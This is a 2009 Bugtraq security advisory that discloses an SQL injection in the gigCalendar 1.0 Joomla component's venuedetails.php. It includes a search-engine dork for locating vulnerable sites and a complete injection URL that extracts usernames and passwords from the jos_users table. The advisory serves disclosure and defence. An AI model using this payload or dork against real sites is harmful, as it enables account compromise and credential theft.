gigCalendar 1.0 (venuedetails.php) Joomla Component SQL Injection
- To: Bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>, submit@xxxxxxxxxxx
- Subject: gigCalendar 1.0 (venuedetails.php) Joomla Component SQL Injection
- From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@xxxxxxxxx>
- Date: Sat, 21 Feb 2009 19:09:30 +0100
- Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message-id:subject :from:to:content-type:content-transfer-encoding; bh=HYqN8uaAJJyiMeqOHZ1geR6zwD2B9gqV1/eCzfoe4ho=; b=GGNEUP14gBiPTeRmAbeb7cDrLJ9TY0Y1vySNsyd4VPz05k2NI9YX50+b2PnoqrwOxs 6HHAq8CyMMjYzeU/0crcRWQemAdMK7qG2EJkMcrksmUah7043Z433P6wYjxXN0GF1W9c 7VkD/5nHt/KICJBetGAW+KS8QSISvhGsFmSCM=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type :content-transfer-encoding; b=F6BOAWCOdbf18iGghmKKn57bpMaJYNFZvHvRV5sSeTb9CQJA6BS0HyNGeN2IQ5PIGX MtgRxPDo9kfiS7WXQhjxDzY80hFM69tJVuYrYbK9AJvCi+gcaWMdgP9EYfaMegb8k0Ia zAu63BT8VkKkpEbUbZkzOTvYX3UFT1DuGNxgU=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
******* Salvatore "drosophila" Fresta *******
Application: gigCalendar Joomla Component 1.0
http://joomlacode.org/gf/project/gigcalendar/
Version: gigCalendar 1.0
Bug: * SQL Injection
Exploitation: Remote
Dork: inurl:"index.php?option=com_gigcal"
Date: 21 Feb 2009
Discovered by:Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
e-mail: drosophilaxxx@xxxxxxxxx
*************************************************
- BUGS
SQL Injection:
Requisites: magic_quotes_gpc = off
File affected: venuedetails.php
This bug allows a guest to view username and
password of a registered user.
http://www.site.com/path/index.php?option=com_gigcal&task=details&gigcal_venues_id=-1'
UNION ALL SELECT 1,concat('username: ',
username),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat('password:
', password),NULL,NULL,NULL,NULL,NULL,NULL FROM jos_users%23
*************************************************
--
Salvatore "drosophila" Fresta
CWNP444351